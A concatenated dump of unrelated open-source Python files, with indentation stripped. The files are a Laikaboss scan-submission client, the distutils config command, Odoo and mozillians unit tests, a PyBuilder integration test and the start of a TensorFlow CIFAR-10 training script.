from socket import gethostname
from optparse import OptionParser
import ConfigParser
import zlib, cPickle as pickle
from laikaboss.objectmodel import ExternalObject, ExternalVars
from laikaboss.constants import level_minimal, level_metadata, level_full
from laikaboss.clientLib import Client, getRootObject, get_scanObjectUID, \
getJSON
from random import randint
import json
from copy import deepcopy as clone_object
from distutils.util import strtobool
job_queue = Queue()
result_queue = Queue()
failed_queue = Queue()
# Variable to store configs from file
configs = {}
# Defaults for all available configurations
# To be used if not specified on command line or config file
default_configs = {
'use_ssh': 'False',
'broker_host': 'tcp://localhost:5558',
'ssh_host': 'localhost',
'request_timeout': '600000',
'request_retries': '1',
'return_level': 'metadata',
'num_procs': '8',
}
def getConfig(option):
value = ''
if option in configs:
value = configs[option]
else:
value = default_configs[option]
return value
def main():
parser = OptionParser(usage="usage: %prog [options] (/path/to/file | stdin)")
parser.add_option("-d", "--debug",
action="store_true",
dest="debug",
help="enable debug messages to the console.")
parser.add_option("-r", "--remove-limit",
action="store_true",
dest="nolimit",
help="disable 20mb size limit (be careful!)")
parser.add_option("-t", "--timeout",
action="store", type="int",
dest="timeout",
help="adjust request timeout period (in seconds)")
parser.add_option("-c", "--config-path",
action="store", type="string",
dest="config_path",
help="specify a path to si-cloudscan.conf.")
parser.add_option("-a", "--address",
action="store", type="string",
dest="broker_host",
help="specify an IP and port to connect to the broker")
parser.add_option("-f", "--file-list",
action="store", type="string",
dest="file_list",
help="Specify a list of files to scan")
parser.add_option("-s", "--ssh-host",
action="store", type="string",
dest="ssh_host",
help="specify a host for the SSH tunnel")
parser.add_option("-p", "--num-procs",
action="store", type="int", default=6,
dest="num_procs",
help="Specify the number of processors to use for recursion")
parser.add_option("-u", "--source",
action="store", type="string",
dest="source",
help="specify a custom source")
parser.add_option("--ssh",
action="store_true",
default=False,
dest="use_ssh",
help="Use SSH tunneling")
parser.add_option("-l", "--level",
action="store", type="string",
dest="return_level",
help="Return Level: minimal, metadata, full [default: metadata]")
parser.add_option("-o", "--out-path",
action="store", type="string",
dest="save_path",
help="If Return Level Full has been specified, provide a path to "
"save the results to [default: current directory]")
parser.add_option("-b", "--buffer",
action="store_true",
dest="stdin_buffer",
help="Specify to allow a buffer to be collected by stdin.")
parser.add_option("-e", "--ephID",
action="store", type="string",
dest="ephID", default="",
help="Specify an ephID to send to Laika.")
parser.add_option("-m", "--ext-metadata",
action="store",
dest="ext_metadata",
help="Specify external metadata to be passed into the scanner.")
parser.add_option("-z", "--log",
action="store_true",
dest="log_db",
help="Specify to turn on logging results.")
parser.add_option("-R", "--recursive",
action="store_true",
default=False,
dest="recursive",
help="Enable recursive directory scanning. If enabled, all files "
"in the specified directory will be scanned. Results will "
"be output to si-cloudscan.log in the current directory.")
(options, args) = parser.parse_args()
# Define default configuration location
CONFIG_PATH = "/etc/si-cloudscan/si-cloudscan.conf"
if options.config_path:
CONFIG_PATH = options.config_path
Config = ConfigParser.ConfigParser()
Config.read(CONFIG_PATH)
# Parse through the config file and append each section to a single dictionary
global configs
for section in Config.sections():
configs.update(dict(Config.items(section)))
# Set the working path, this will be used for file ouput if another
# path is not specified
WORKING_PATH = os.getcwd()
if options.use_ssh:
USE_SSH = True
else:
if strtobool(getConfig('use_ssh')):
USE_SSH = True
else:
USE_SSH = False
if options.ssh_host:
SSH_HOST = options.ssh_host
else:
SSH_HOST = getConfig('ssh_host')
if options.broker_host:
BROKER_HOST = options.broker_host
else:
BROKER_HOST = getConfig('broker_host')
if options.debug:
logging.basicConfig(level=logging.DEBUG)
logging.debug("Host: %s" % BROKER_HOST)
if options.return_level:
RETURN_LEVEL = options.return_level
else:
RETURN_LEVEL = getConfig('return_level')
if options.source:
SOURCE = options.source
else:
SOURCE = "si-cloudscan"
if not options.log_db:
SOURCE += "-nolog"
if options.save_path:
SAVE_PATH = options.save_path
else:
SAVE_PATH = WORKING_PATH
if options.num_procs:
num_procs = int(options.num_procs)
else:
num_procs = int(getConfig('num_procs'))
if options.timeout:
logging.debug("default timeout changed to %i" % options.timeout)
REQUEST_TIMEOUT = options.timeout * 1000
else:
REQUEST_TIMEOUT = int(getConfig('request_timeout'))
if options.ext_metadata:
try:
ext_metadata = json.loads(options.ext_metadata)
assert isinstance(ext_metadata, dict)
except:
print "External Metadata must be a dictionary!"
sys.exit(0)
else:
ext_metadata = dict()
REQUEST_RETRIES = int(getConfig('request_retries'))
# Attempt to get the hostname
try:
hostname = gethostname().split('.')[0]
except:
hostname = "none"
# Attempt to set the return level, throw an error if it doesn't exist.
try:
return_level = globals()["level_%s" % RETURN_LEVEL]
except KeyError as e:
print "Please specify a valid return level: minimal, metadata or full"
sys.exit(1)
if not options.recursive:
try:
file_buffer = ''
# Try to read the file
if len(args) > 0:
file_buffer = open(args[0], 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (args[0], file_len))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
file_buffer += line
if not file_buffer:
parser.print_usage()
sys.exit(1)
file_len = len(file_buffer)
if file_len > 20971520 and not options.nolimit:
print "You're trying to scan a file larger than 20mb.. Are you sure?"
print "Use the --remove-limit flag if you really want to do this."
sys.exit(1)
except IOError as e:
print "\nERROR: The file does not exist: %s\n" % (args[0],)
sys.exit(1)
else:
try:
fileList = []
if options.file_list:
fileList = open(options.file_list).read().splitlines()
else:
if len(args) > 0:
rootdir = args[0]
for root, subFolders, files in os.walk(rootdir):
for fname in files:
fileList.append(os.path.join(root, fname))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
fileList.append(line)
if not fileList:
parser.print_usage()
sys.exit(1)
if len(fileList) > 1000 and not options.nolimit:
print "You're trying to scan over 1000 files... Are you sure?"
print "Use the --remove-limit flag if you really want to do this."
sys.exit(1)
except IOError as e:
print "\nERROR: Directory does not exist: %s\n" % (args[0],)
sys.exit(1)
if not options.recursive:
# Construct the object to be sent for scanning
if args:
filename = args[0]
else:
filename = "stdin"
ext_metadata['server'] = hostname
ext_metadata['user'] = getpass.getuser()
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=filename,
ephID=options.ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
try:
if not options.recursive:
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST, useGevent=True)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST, useGevent=True)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
rootObject = getRootObject(result)
try:
jsonResult = getJSON(result)
print jsonResult
except:
logging.exception("error occured collecting results")
return
if return_level == level_full:
SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(SAVE_PATH):
try:
os.makedirs(SAVE_PATH)
print "\nWriting results to %s...\n" % SAVE_PATH
except (OSError, IOError) as e:
print "\nERROR: unable to write to %s...\n" % SAVE_PATH
return
else:
print "\nOutput folder already exists! Skipping results output...\n"
return
for uid, scanObject in result.files.iteritems():
f = open("%s/%s" % (SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
try:
if scanObject.filename and scanObject.parent:
linkPath = "%s/%s" % (SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
filenameParts = scanObject.filename.split("/")
os.symlink("%s" % (uid), "%s/%s" % (SAVE_PATH, filenameParts[-1]))
except:
print "Unable to create symlink for %s" % (uid)
f = open("%s/%s" % (SAVE_PATH, "results.log"), "wb")
f.write(jsonResult)
f.close()
sys.exit(1)
else:
try:
fh = open('si-cloudscan.log', 'w')
fh.close()
except:
pass
for fname in fileList:
job_queue.put(fname)
for i in range(num_procs):
job_queue.put("STOP")
print "File list length: %s" % len(fileList)
for i in range(num_procs):
Process(target=worker, args=(options.nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST,ext_metadata,options.ephID,)).start()
results_processed = 0
while results_processed < len(fileList):
logging.debug("Files left: %s" % ((len(fileList) - results_processed)))
resultText = result_queue.get()
try:
# Process results
fh = open('si-cloudscan.log', 'ab')
fh.write('%s\n' % resultText)
fh.close()
results_processed += 1
except Exception as e:
raise
print 'Wrote results to si-cloudscan.log'
except KeyboardInterrupt:
print "Interrupted by user, exiting..."
sys.exit(1)
def worker(nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST, ext_metadata, ephID):
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST)
randNum = randint(1, 10000)
for fname in iter(job_queue.get, 'STOP'):
print "Worker %s: Starting new request" % randNum
try:
# Try to read the file
file_buffer = open(fname, 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (fname, file_len))
if file_len > 20971520 and not nolimit:
print "You're trying to scan a file larger than 20mb.. Are you sure?"
print "Use the --remove-limit flag if you really want to do this."
print "File has not been scanned: %s" % fname
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to size: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
except IOError as e:
print "\nERROR: The file does not exist: %s\n" % (fname,)
print "Moving to next file..."
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to an IO Error: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
try:
# Construct the object to be sent for scanning
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=fname,
ephID=ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
if not result:
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile timed out in the scanner: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
rootObject = getRootObject(result)
jsonResult = getJSON(result)
resultText = '%s\n' % jsonResult
if return_level == level_full:
FILE_SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(FILE_SAVE_PATH):
try:
os.makedirs(FILE_SAVE_PATH)
print "Writing results to %s..." % FILE_SAVE_PATH
except (OSError, IOError) as e:
print "\nERROR: unable to write to %s...\n" % FILE_SAVE_PATH
return
else:
print "\nOutput folder already exists! Skipping results output...\n"
return
for uid, scanObject in result.files.iteritems():
f = open("%s/%s" % (FILE_SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
if scanObject.filename and scanObject.depth != 0:
linkPath = "%s/%s" % (FILE_SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
filenameParts = scanObject.filename.split("/")
linkPath = "%s/%s" % (FILE_SAVE_PATH, filenameParts[-1])
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
f = open("%s/%s" % (FILE_SAVE_PATH, "results.json"), "wb")
f.write(jsonResult)
f.close()
result_queue.put(resultText)
except:
#logging.exception("error occured collecting results")
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nUNKNOWN ERROR OCCURRED: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
if __name__ == "__main__":
main()
| apache-2.0 |
vizual54/MissionPlanner | Lib/distutils/command/config.py | 50 | 13487 | """distutils.command.config
Implements the Distutils 'config' command, a (mostly) empty command class
that exists mainly to be sub-classed by specific module distributions and
applications. The idea is that while every "config" command is different,
at least they're all named the same, and users always see "config" in the
list of standard commands. Also, this is a good place to put common
configure-like tasks: "try to compile this C code", or "figure out where
this header file lives".
"""
__revision__ = "$Id$"
import os
import re
from distutils.core import Command
from distutils.errors import DistutilsExecError
from distutils.ccompiler import customize_compiler
from distutils import log
LANG_EXT = {'c': '.c', 'c++': '.cxx'}
class config(Command):
description = "prepare to build"
user_options = [
('compiler=', None,
"specify the compiler type"),
('cc=', None,
"specify the compiler executable"),
('include-dirs=', 'I',
"list of directories to search for header files"),
('define=', 'D',
"C preprocessor macros to define"),
('undef=', 'U',
"C preprocessor macros to undefine"),
('libraries=', 'l',
"external C libraries to link with"),
('library-dirs=', 'L',
"directories to search for external C libraries"),
('noisy', None,
"show every action (compile, link, run, ...) taken"),
('dump-source', None,
"dump generated source files before attempting to compile them"),
]
# The three standard command methods: since the "config" command
# does nothing by default, these are empty.
def initialize_options(self):
self.compiler = None
self.cc = None
self.include_dirs = None
self.libraries = None
self.library_dirs = None
# maximal output for now
self.noisy = 1
self.dump_source = 1
# list of temporary files generated along-the-way that we have
# to clean at some point
self.temp_files = []
def finalize_options(self):
if self.include_dirs is None:
self.include_dirs = self.distribution.include_dirs or []
elif isinstance(self.include_dirs, str):
self.include_dirs = self.include_dirs.split(os.pathsep)
if self.libraries is None:
self.libraries = []
elif isinstance(self.libraries, str):
self.libraries = [self.libraries]
if self.library_dirs is None:
self.library_dirs = []
elif isinstance(self.library_dirs, str):
self.library_dirs = self.library_dirs.split(os.pathsep)
def run(self):
pass
# Utility methods for actual "config" commands. The interfaces are
# loosely based on Autoconf macros of similar names. Sub-classes
# may use these freely.
def _check_compiler(self):
"""Check that 'self.compiler' really is a CCompiler object;
if not, make it one.
"""
# We do this late, and only on-demand, because this is an expensive
# import.
from distutils.ccompiler import CCompiler, new_compiler
if not isinstance(self.compiler, CCompiler):
self.compiler = new_compiler(compiler=self.compiler,
dry_run=self.dry_run, force=1)
customize_compiler(self.compiler)
if self.include_dirs:
self.compiler.set_include_dirs(self.include_dirs)
if self.libraries:
self.compiler.set_libraries(self.libraries)
if self.library_dirs:
self.compiler.set_library_dirs(self.library_dirs)
def _gen_temp_sourcefile(self, body, headers, lang):
filename = "_configtest" + LANG_EXT[lang]
file = open(filename, "w")
if headers:
for header in headers:
file.write("#include <%s>\n" % header)
file.write("\n")
file.write(body)
if body[-1] != "\n":
file.write("\n")
file.close()
return filename
def _preprocess(self, body, headers, include_dirs, lang):
src = self._gen_temp_sourcefile(body, headers, lang)
out = "_configtest.i"
self.temp_files.extend([src, out])
self.compiler.preprocess(src, out, include_dirs=include_dirs)
return (src, out)
def _compile(self, body, headers, include_dirs, lang):
src = self._gen_temp_sourcefile(body, headers, lang)
if self.dump_source:
dump_file(src, "compiling '%s':" % src)
(obj,) = self.compiler.object_filenames([src])
self.temp_files.extend([src, obj])
self.compiler.compile([src], include_dirs=include_dirs)
return (src, obj)
def _link(self, body, headers, include_dirs, libraries, library_dirs,
lang):
(src, obj) = self._compile(body, headers, include_dirs, lang)
prog = os.path.splitext(os.path.basename(src))[0]
self.compiler.link_executable([obj], prog,
libraries=libraries,
library_dirs=library_dirs,
target_lang=lang)
if self.compiler.exe_extension is not None:
prog = prog + self.compiler.exe_extension
self.temp_files.append(prog)
return (src, obj, prog)
def _clean(self, *filenames):
if not filenames:
filenames = self.temp_files
self.temp_files = []
log.info("removing: %s", ' '.join(filenames))
for filename in filenames:
try:
os.remove(filename)
except OSError:
pass
# XXX these ignore the dry-run flag: what to do, what to do? even if
# you want a dry-run build, you still need some sort of configuration
# info. My inclination is to make it up to the real config command to
# consult 'dry_run', and assume a default (minimal) configuration if
# true. The problem with trying to do it here is that you'd have to
# return either true or false from all the 'try' methods, neither of
# which is correct.
# XXX need access to the header search path and maybe default macros.
def try_cpp(self, body=None, headers=None, include_dirs=None, lang="c"):
"""Construct a source file from 'body' (a string containing lines
of C/C++ code) and 'headers' (a list of header files to include)
and run it through the preprocessor. Return true if the
preprocessor succeeded, false if there were any errors.
('body' probably isn't of much use, but what the heck.)
"""
from distutils.ccompiler import CompileError
self._check_compiler()
ok = 1
try:
self._preprocess(body, headers, include_dirs, lang)
except CompileError:
ok = 0
self._clean()
return ok
def search_cpp(self, pattern, body=None, headers=None, include_dirs=None,
lang="c"):
"""Construct a source file (just like 'try_cpp()'), run it through
the preprocessor, and return true if any line of the output matches
'pattern'. 'pattern' should either be a compiled regex object or a
string containing a regex. If both 'body' and 'headers' are None,
preprocesses an empty file -- which can be useful to determine the
symbols the preprocessor and compiler set by default.
"""
self._check_compiler()
src, out = self._preprocess(body, headers, include_dirs, lang)
if isinstance(pattern, str):
pattern = re.compile(pattern)
file = open(out)
match = 0
while 1:
line = file.readline()
if line == '':
break
if pattern.search(line):
match = 1
break
file.close()
self._clean()
return match
def try_compile(self, body, headers=None, include_dirs=None, lang="c"):
"""Try to compile a source file built from 'body' and 'headers'.
Return true on success, false otherwise.
"""
from distutils.ccompiler import CompileError
self._check_compiler()
try:
self._compile(body, headers, include_dirs, lang)
ok = 1
except CompileError:
ok = 0
log.info(ok and "success!" or "failure.")
self._clean()
return ok
def try_link(self, body, headers=None, include_dirs=None, libraries=None,
library_dirs=None, lang="c"):
"""Try to compile and link a source file, built from 'body' and
'headers', to executable form. Return true on success, false
otherwise.
"""
from distutils.ccompiler import CompileError, LinkError
self._check_compiler()
try:
self._link(body, headers, include_dirs,
libraries, library_dirs, lang)
ok = 1
except (CompileError, LinkError):
ok = 0
log.info(ok and "success!" or "failure.")
self._clean()
return ok
def try_run(self, body, headers=None, include_dirs=None, libraries=None,
library_dirs=None, lang="c"):
"""Try to compile, link to an executable, and run a program
built from 'body' and 'headers'. Return true on success, false
otherwise.
"""
from distutils.ccompiler import CompileError, LinkError
self._check_compiler()
try:
src, obj, exe = self._link(body, headers, include_dirs,
libraries, library_dirs, lang)
self.spawn([exe])
ok = 1
except (CompileError, LinkError, DistutilsExecError):
ok = 0
log.info(ok and "success!" or "failure.")
self._clean()
return ok
# -- High-level methods --------------------------------------------
# (these are the ones that are actually likely to be useful
# when implementing a real-world config command!)
def check_func(self, func, headers=None, include_dirs=None,
libraries=None, library_dirs=None, decl=0, call=0):
"""Determine if function 'func' is available by constructing a
source file that refers to 'func', and compiles and links it.
If everything succeeds, returns true; otherwise returns false.
The constructed source file starts out by including the header
files listed in 'headers'. If 'decl' is true, it then declares
'func' (as "int func()"); you probably shouldn't supply 'headers'
and set 'decl' true in the same call, or you might get errors about
a conflicting declarations for 'func'. Finally, the constructed
'main()' function either references 'func' or (if 'call' is true)
calls it. 'libraries' and 'library_dirs' are used when
linking.
"""
self._check_compiler()
body = []
if decl:
body.append("int %s ();" % func)
body.append("int main () {")
if call:
body.append(" %s();" % func)
else:
body.append(" %s;" % func)
body.append("}")
body = "\n".join(body) + "\n"
return self.try_link(body, headers, include_dirs,
libraries, library_dirs)
# check_func ()
def check_lib(self, library, library_dirs=None, headers=None,
include_dirs=None, other_libraries=[]):
"""Determine if 'library' is available to be linked against,
without actually checking that any particular symbols are provided
by it. 'headers' will be used in constructing the source file to
be compiled, but the only effect of this is to check if all the
header files listed are available. Any libraries listed in
'other_libraries' will be included in the link, in case 'library'
has symbols that depend on other libraries.
"""
self._check_compiler()
return self.try_link("int main (void) { }",
headers, include_dirs,
[library]+other_libraries, library_dirs)
def check_header(self, header, include_dirs=None, library_dirs=None,
lang="c"):
"""Determine if the system header file named by 'header_file'
exists and can be found by the preprocessor; return true if so,
false otherwise.
"""
return self.try_cpp(body="/* No body */", headers=[header],
include_dirs=include_dirs)
def dump_file(filename, head=None):
"""Dumps a file content into log.info.
If head is not None, will be dumped before the file content.
"""
if head is None:
log.info('%s' % filename)
else:
log.info(head)
file = open(filename)
try:
log.info(file.read())
finally:
file.close()
| gpl-3.0 |
tvibliani/odoo | addons/account/tests/test_fiscal_position.py | 246 | 2501 | from openerp.tests.common import TransactionCase
class TestFiscalPosition(TransactionCase):
"""Tests for fiscal positions in auto apply (account.fiscal.position).
If a partner has a vat number, the fiscal positions with "vat_required=True"
are prefered.
"""
def setUp(self):
super(TestFiscalPosition, self).setUp()
self.fiscal_position_model = self.registry('account.fiscal.position')
self.res_partner_model = self.registry('res.partner')
self.res_country_model = self.registry('res.country')
def test_fiscal_position(self):
cr, uid = self.cr, self.uid
company_id = 1
country_id = self.res_country_model.search(cr, uid, [('name', '=', 'France')])[0]
partner_id = self.res_partner_model.create(cr, uid, dict(
name="George",
vat_subjected=True,
notify_email="always",
country_id=country_id))
fp_b2c_id = self.fiscal_position_model.create(cr, uid, dict(name="EU-VAT-FR-B2C",
auto_apply=True,
country_id=country_id,
vat_required=False,
sequence=1))
fp_b2b_id = self.fiscal_position_model.create(cr, uid, dict(name="EU-VAT-FR-B2B",
auto_apply=True,
country_id=country_id,
vat_required=True,
sequence=2))
res = self.fiscal_position_model.get_fiscal_position(cr, uid, company_id, partner_id)
self.assertEquals(fp_b2b_id, res,
"Fiscal position detection should pick B2B position as 1rst match")
self.fiscal_position_model.write(cr, uid, [fp_b2b_id], {'auto_apply': False})
res = self.fiscal_position_model.get_fiscal_position(cr, uid, company_id, partner_id)
self.assertEquals(fp_b2c_id, res,
"Fiscal position detection should pick B2C position as 1rst match")
| agpl-3.0 |
hoosteeno/mozillians | mozillians/geo/tests/test_lookup.py | 5 | 8450 | from django.test.utils import override_settings
from mock import patch
from nose.tools import eq_, ok_
from requests import ConnectionError, HTTPError
from mozillians.common.tests import TestCase
from mozillians.geo.models import Country, Region, City
from mozillians.geo.lookup import (GeoLookupException, deduplicate_cities,
get_first_mapbox_geocode_result,
result_to_city, result_to_country_region_city,
result_to_country, result_to_region, reverse_geocode)
from mozillians.geo.tests import CountryFactory, RegionFactory, CityFactory
from mozillians.users.tests import UserFactory
@patch('mozillians.geo.lookup.requests')
class TestCallingGeocode(TestCase):
def test_raise_on_error(self, mock_requests):
mock_requests.get.return_value.raise_for_status.side_effect = HTTPError
with self.assertRaises(GeoLookupException):
reverse_geocode(40, 20)
mock_requests.get.return_value.raise_for_status.side_effect = ConnectionError
with self.assertRaises(GeoLookupException):
reverse_geocode(40, 20)
def test_url(self, mock_requests):
lng = lat = 1.0
map_id = 'fake.map.id'
with override_settings(MAPBOX_MAP_ID=map_id):
get_first_mapbox_geocode_result('1.0,1.0')
expected_url = 'http://api.tiles.mapbox.com/v3/%s/geocode/%s,%s.json' % (map_id, lng, lat)
mock_requests.get.assert_called_with(expected_url)
@patch('mozillians.geo.lookup.result_to_country_region_city')
@patch('mozillians.geo.lookup.get_first_mapbox_geocode_result')
class TestReverseGeocode(TestCase):
def test_empty(self, mock_get_result, mock_result_to_country):
# If get result returns nothing, reverse_geocode returns Nones
mock_get_result.return_value = {}
eq_((None, None, None), reverse_geocode(0.0, 0.0))
ok_(not mock_result_to_country.called)
def test_results(self, mock_get_result, mock_result_to_country):
# If any result, calls result_to_country_region_city
mock_get_result.return_value = {'foo': 1}
mock_result_to_country.return_value = (1, 2, 3)
eq_((1, 2, 3), reverse_geocode(0.0, 0.0))
mock_result_to_country.assert_called_with(mock_get_result.return_value)
class TestResultToCountryRegionCity(TestCase):
@patch('mozillians.geo.lookup.result_to_country')
def test_no_country(self, mock_result_to_country):
# If result_to_country returns None, None, None
mock_result_to_country.return_value = None
eq_((None, None, None), result_to_country_region_city({'foo': 1}))
@patch('mozillians.geo.lookup.result_to_country')
@patch('mozillians.geo.lookup.result_to_region')
def test_country(self, mock_result_to_region, mock_result_to_country):
# If country in results, builds a Country object, passes result to result_to_region
result = {
'country': {'id': 'mapbox_id', 'name': 'Petoria'},
}
mock_result_to_country.return_value = CountryFactory.create(mapbox_id='mapbox_id',
name='Petoria')
mock_result_to_region.return_value = None
country, region, city = result_to_country_region_city(result)
ok_(region is None)
ok_(city is None)
ok_(country is not None)
ok_(isinstance(country, Country))
eq_('mapbox_id', country.mapbox_id)
eq_('Petoria', country.name)
mock_result_to_region.assert_called_with(result, country)
class TestResultToCountry(TestCase):
def test_no_country(self):
eq_(None, result_to_country({'foo': 1}))
def test_with_country(self):
result = {'country': {'id': 'mapbox_id', 'name': 'Petoria'}}
country = result_to_country(result)
ok_(country is not None)
ok_(isinstance(country, Country))
eq_('mapbox_id', country.mapbox_id)
eq_('Petoria', country.name)
def test_update_country_name(self):
# If country name has changed, we update our database
country = CountryFactory.create()
# Mapbox returns same country ID, but new improved country name
new_name = 'Democratic Republic of %s' % country.name
result = {'country': {'id': country.mapbox_id,
'name': new_name}}
country = result_to_country(result)
country = Country.objects.get(pk=country.pk)
eq_(new_name, country.name)
def test_country_code_set(self):
greece = {'country': {'id': 'mapbox_id', 'name': 'Greece'}}
country = result_to_country(greece)
ok_(isinstance(country, Country))
eq_(country.code, u'gr')
class TestResultToRegion(TestCase):
def test_no_region(self):
country = CountryFactory.create()
eq_(None, result_to_region({}, country))
def test_with_region(self):
country = CountryFactory.create()
result = {
'province': {
'name': 'NC',
'id': 'ID'
}
}
region = result_to_region(result, country)
eq_('NC', region.name)
eq_('ID', region.mapbox_id)
eq_(country, region.country)
def test_update_name(self):
# If region name has changed, we update our database
country = CountryFactory.create()
region = RegionFactory.create(country=country)
new_name = 'New %s' % region.name
result = {
'province': {
'name': new_name,
'id': region.mapbox_id,
}
}
result_to_region(result, country)
region = Region.objects.get(pk=region.pk)
eq_(new_name, region.name)
class TestResultToCity(TestCase):
def test_no_city(self):
eq_(None, result_to_city({}, None, None))
def test_with_city(self):
country = CountryFactory.create()
region = RegionFactory.create(country=country)
result = {
'city': {
'name': 'Carrboro',
'id': '1234',
'lat': 0.0,
'lon': 0.0,
}
}
city = result_to_city(result, country, region)
eq_('Carrboro', city.name)
eq_('1234', city.mapbox_id)
eq_(region, city.region)
eq_(country, city.country)
def test_without_region(self):
# region can be None
country = CountryFactory.create()
region = None
result = {
'city': {
'name': 'Carrboro',
'id': '1234',
'lat': 0.0,
'lon': 0.0,
}
}
city = result_to_city(result, country, region)
eq_('Carrboro', city.name)
eq_('1234', city.mapbox_id)
eq_(region, city.region)
eq_(country, city.country)
def test_update_name(self):
city = CityFactory.create()
new_name = 'New %s' % city.name
result = {
'city': {
'name': new_name,
'id': city.mapbox_id,
'lat': city.lat,
'lon': city.lng,
}
}
result_to_city(result, city.country, None)
city = City.objects.get(pk=city.pk)
eq_(new_name, city.name)
def test_deduplication_required(self):
city = CityFactory.create()
dup_city = CityFactory.create()
result = {
'city': {
'name': dup_city.name,
'id': city.mapbox_id,
'lat': dup_city.lat,
'lon': dup_city.lng,
}
}
result_to_city(result, dup_city.country, dup_city.region)
lookup_args = {
'region': dup_city.region,
'country': dup_city.country,
'name': dup_city.name,
}
ok_(City.objects.filter(**lookup_args).exists())
ok_(not City.objects.filter(mapbox_id=dup_city.mapbox_id).exists())
def test_deduplicate_cities(self):
cities = CityFactory.create_batch(2)
for city in cities:
UserFactory.create(userprofile={'geo_city': city})
deduplicate_cities(cities[0], cities[1])
city = City.objects.get(id=cities[0].id)
ok_(not City.objects.filter(id=cities[1].id).exists())
eq_(city.userprofile_set.all().count(), 2)
| bsd-3-clause |
pybuilder/pybuilder | src/integrationtest/python/should_ignore_hidden_files_in_scripts_tests.py | 3 | 1382 | # -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2020 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from itest_support import IntegrationTestSupport
class Test(IntegrationTestSupport):
def test(self):
self.write_build_file("""
from pybuilder.core import use_plugin
use_plugin("python.core")
use_plugin("python.distutils")
name = "integration-test"
default_task = "publish"
""")
self.create_directory("src/main/python/spam")
self.write_file("src/main/python/spam/__init__.py", "")
self.create_directory("src/main/scripts")
# write the magic byte to the hidden file
self.write_binary_file("src/main/scripts/.eggs", b'\x8a')
reactor = self.prepare_reactor()
reactor.build()
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
sachinpro/sachinpro.github.io | tensorflow/models/image/cifar10/cifar10_multi_gpu_train.py | 10 | 10673 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A binary to train CIFAR-10 using multiple GPU's with synchronous updates.
Accuracy:
cifar10_multi_gpu_train.py achieves ~86% accuracy after 100K steps (256
epochs of data) as judged by cifar10_eval.py.
Speed: With batch_size 128.
System | Step Time (sec/batch) | Accuracy
--------------------------------------------------------------------
1 Tesla K20m | 0.35-0.60 | ~86% at 60K steps (5 hours)
1 Tesla K40m | 0.25-0.35 | ~86% at 100K steps (4 hours)
2 Tesla K20m | 0.13-0.20 | ~84% at 30K steps (2.5 hours)
